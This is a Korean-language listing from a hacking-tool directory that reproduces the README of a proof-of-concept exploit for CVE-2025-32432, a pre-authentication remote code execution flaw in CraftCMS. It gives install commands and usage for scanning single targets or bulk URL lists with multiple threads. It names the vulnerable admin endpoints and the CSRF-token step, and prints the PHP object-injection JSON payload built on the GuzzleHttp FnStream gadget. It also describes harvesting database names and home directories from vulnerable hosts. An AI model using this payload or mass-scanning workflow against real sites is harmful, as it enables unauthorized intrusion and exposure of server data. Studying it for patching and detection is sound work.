Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32432 — 이 저장소에는 CraftCMS 4.x 및 5.x 버전에 영향을 미치는 인증 전 원격 코드 실행(RCE) 취약점인 CVE-2025-32432에 대한 개념 증명(PoC) 익스플로잇 스크립트가 포함되어 있습니다. 이 취약점은 CraftCMS의 자산 변환(asset transform) 생성 기능에 존재합니다. | Kitploit
도구/GitHubGitHub/sachinart/cve-2025-32432
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubsachinart/cve-2025-32432

CVE-2025-32432

이 저장소에는 CraftCMS 4.x 및 5.x 버전에 영향을 미치는 인증 전 원격 코드 실행(RCE) 취약점인 CVE-2025-32432에 대한 개념 증명(PoC) 익스플로잇 스크립트가 포함되어 있습니다. 이 취약점은 CraftCMS의 자산 변환(asset transform) 생성 기능에 존재합니다.

저장소 보기
27431년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CraftCMS CVE-2025-32432 익스플로잇 (Chirag Artani)

개요

이 저장소는 CraftCMS 4.x 및 5.x 버전에 영향을 미치는 사전 인증 원격 코드 실행(RCE) 취약점인 CVE-2025-32432에 대한 개념 증명 익스플로잇 스크립트를 포함합니다. 이 취약점은 CraftCMS의 자산 변환 생성 기능에 존재합니다.

이 익스플로잇 스크립트는 다음을 통해 취약점 탐지 및 확인을 자동화합니다:

  1. CraftCMS 관리자 대시보드에서 CSRF 토큰 추출
  2. PHP 객체 주입을 통한 취약점 악용
  3. 시스템 정보 추출을 통한 성공적인 악용 확인

면책 조항

⚠️ 이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

이 도구는 명시적 테스트 허가를 받은 시스템에 대해서만 사용하십시오. 허가 없이 시스템을 무단 테스트하는 것은 불법이며 비윤리적입니다.

기능

  • 단일 대상 및 다중 대상(파일 기반) 스캔 지원
  • 다중 대상 빠른 스캔을 위한 멀티스레딩 기능
  • 데이터베이스 이름 및 홈 디렉터리 정보를 포함한 상세 출력
  • 취약한 대상에 대한 CSV 보고서 생성
  • 자체 서명 인증서 테스트를 위한 SSL 인증 확인 우회
  • 강력한 오류 처리

설치

root@kitploit:~
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Install required dependencies
pip install -r requirements.txt

요구 사항

  • Python 3.6 이상
  • 필수 Python 패키지 (requirements.txt 참조):
    • requests
    • beautifulsoup4
    • urllib3

사용법

단일 대상

단일 대상 스캔:

root@kitploit:~
python3 craftcms_rce.py -u example.com

다중 대상

파일에서 여러 대상 스캔 (한 줄에 하나의 URL):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

여기서 -t는 사용할 스레드 수를 지정합니다 (기본값은 5).

옵션

root@kitploit:~
-u, --url     테스트할 단일 URL
-f, --file    테스트할 URL이 포함된 파일 (한 줄에 하나)
-t, --threads 스레드 수 (기본값: 5)
-h, --help    도움말 메시지 표시 및 종료

출력

스크립트는 결과를 콘솔에 출력하고 취약한 대상을 다음 열을 포함한 CSV 형식으로 vulnerable.txt에 저장합니다:

  • URL
  • CRAFT_DB_DATABASE 값 (데이터베이스 이름)
  • HOME 디렉터리 경로
  • 기타 시스템 정보

콘솔 출력 예시:

root@kitploit:~
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt

취약점 작동 방식

이 취약점은 CraftCMS의 역직렬화 문제를 이용합니다. 익스플로잇은 다음과 같이 작동합니다:

  1. CSRF 토큰을 얻기 위해 /index.php?p=admin/dashboard로 GET 요청을 보냅니다.
  2. 특수하게 조작된 JSON 페이로드를 포함하여 /index.php?p=admin/actions/assets/generate-transform으로 POST 요청을 보냅니다.
  3. 페이로드는 역직렬화되는 PHP 객체를 포함하며, 이로 인해 GuzzleHttp\Psr7\FnStream 클래스를 통한 임의 코드 실행이 발생합니다.
  4. phpinfo()를 실행하고 특정 시스템 정보를 추출하여 성공적인 악용을 확인합니다.

기술 세부 사항

이 익스플로잇은 자산 변환 생성 과정의 안전하지 않은 역직렬화를 이용합니다. 취약한 코드 경로를 통해 공격자는 역직렬화되는 사용자 정의 PHP 객체를 주입하여 임의 코드 실행을 유발할 수 있습니다.

페이로드의 주요 구성 요소는 다음과 같습니다:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

기여

기여, 이슈 제보, 기능 요청은 언제나 환영합니다! 이슈 페이지를 확인해 주세요.

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

참고 자료

  • CVE-2025-32432 세부 정보
  • CraftCMS 보안 권고

저자

  • Nicolas Bourras (Orange Cyberdefense) - 원본 취약점 발견
  • Chirag Artani - 익스플로잇 스크립트 작성자
도구 다운로드